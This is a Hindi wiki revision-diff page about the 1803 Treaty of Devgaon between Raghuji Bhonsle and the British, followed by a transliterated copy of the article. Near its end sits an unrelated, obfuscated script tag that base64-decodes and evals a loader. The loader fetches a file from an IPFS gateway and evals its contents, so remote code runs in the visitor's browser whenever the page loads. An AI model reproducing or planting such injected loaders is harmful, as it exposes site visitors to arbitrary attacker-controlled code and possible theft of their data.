Difference between revisions of "देवगाँव की संधि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 1: Line 1:
*देवगाँव की संधि, 17 दिसम्बर 1803 ई. को [[रघुजी भोंसले]] और अंग्रेज़ों के बीच हुई।
+
*'''देवगाँव की संधि''' [[17 दिसम्बर]], 1803 ई. को [[रघुजी भोंसले]] और [[अंग्रेज़|अंग्रेज़ों]] के बीच हुई थी।
*द्वितीय [[मराठा]] युद्ध के दौरान [[आरगाँव की लड़ाई]] (नवम्बर 1803) में [[अंग्रेज़|अंग्रेज़ों]] ने भोंसले को पराजित किया था, उसी के फलस्वरूप उक्त संधि हुई।
+
*द्वितीय [[मराठा]] युद्ध के दौरान [[आरगाँव की लड़ाई]] (नवम्बर 1803) में अंग्रेज़ों ने रघुजी भोंसले को पराजित किया था, उसी के फलस्वरूप उक्त संधि हुई।
*इसके अनुसार [[बरार]] के भोंसला राजा ने अंग्रेज़ों को [[कटक]] का प्रान्त दे दिया। जिसमें [[बालासोर]] के अलावा वरदा नदी के पश्चिम का समस्त भाग शामिल था।
+
*इस संधि के अनुसार [[बरार]] के भोंसला राजा ने अंग्रेज़ों को [[कटक]] का प्रान्त दे दिया, जिसमें [[बालासोर]] के अलावा वरदा नदी के पश्चिम का समस्त भाग शामिल था।
 
*भोंसला राजा को अपनी राजधानी [[नागपुर]] में ब्रिटिश रेजीडेण्ट रखने के लिए मज़बूर होना पड़ा।
 
*भोंसला राजा को अपनी राजधानी [[नागपुर]] में ब्रिटिश रेजीडेण्ट रखने के लिए मज़बूर होना पड़ा।
*उसने निज़ाम अथवा [[पेशवा]] के साथ होने वाले किसी भी झगड़े में अंग्रेज़ों को पंच बनाना स्वीकार किया और यह वायदा किया कि वह अपने यहाँ कम्पनी सरकार की *अनुमति के बिना किसी भी यूरोपीय अथवा अमेरिकी को नौकरी नहीं देगा।
+
*उसने निज़ाम अथवा [[पेशवा]] के साथ होने वाले किसी भी झगड़े में अंग्रेज़ों को पंच बनाना स्वीकार कर लिया।
 +
*अंग्रेज़ों ने उससे यह वायदा भी लिया कि, वह अपने यहाँ कम्पनी सरकार की अनुमति के बिना किसी भी यूरोपीय अथवा अमेरिकी को नौकरी नहीं देगा।
 
*व्यावहारिक दृष्टिकोण से इस संधि ने भोंसले को अंग्रेज़ों का आश्रित बना दिया।
 
*व्यावहारिक दृष्टिकोण से इस संधि ने भोंसले को अंग्रेज़ों का आश्रित बना दिया।
  
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
Line 17: Line 18:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{औपनिवेशिक काल}}
 +
[[Category:इतिहास कोश]]
 +
[[Category:मराठा साम्राज्य]]
 +
[[Category:औपनिवेशिक काल]]
 +
[[Category:अंग्रेज़ी शासन]]
 
__INDEX__
 
__INDEX__

Revision as of 05:07, 24 April 2011

  • devagaanv ki sandhi 17 disambar, 1803 ee. ko raghuji bhoansale aur aangrezoan ke bich huee thi.
  • dvitiy maratha yuddh ke dauran aragaanv ki l daee (navambar 1803) mean aangrezoan ne raghuji bhoansale ko parajit kiya tha, usi ke phalasvaroop ukt sandhi huee.
  • is sandhi ke anusar barar ke bhoansala raja ne aangrezoan ko katak ka prant de diya, jisamean balasor ke alava varada nadi ke pashchim ka samast bhag shamil tha.
  • bhoansala raja ko apani rajadhani nagapur mean british rejident rakhane ke lie mazaboor hona p da.
  • usane nizam athava peshava ke sath hone vale kisi bhi jhag de mean aangrezoan ko panch banana svikar kar liya.
  • aangrezoan ne usase yah vayada bhi liya ki, vah apane yahaan kampani sarakar ki anumati ke bina kisi bhi yooropiy athava ameriki ko naukari nahian dega.
  • vyavaharik drishtikon se is sandhi ne bhoansale ko aangrezoan ka ashrit bana diya.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh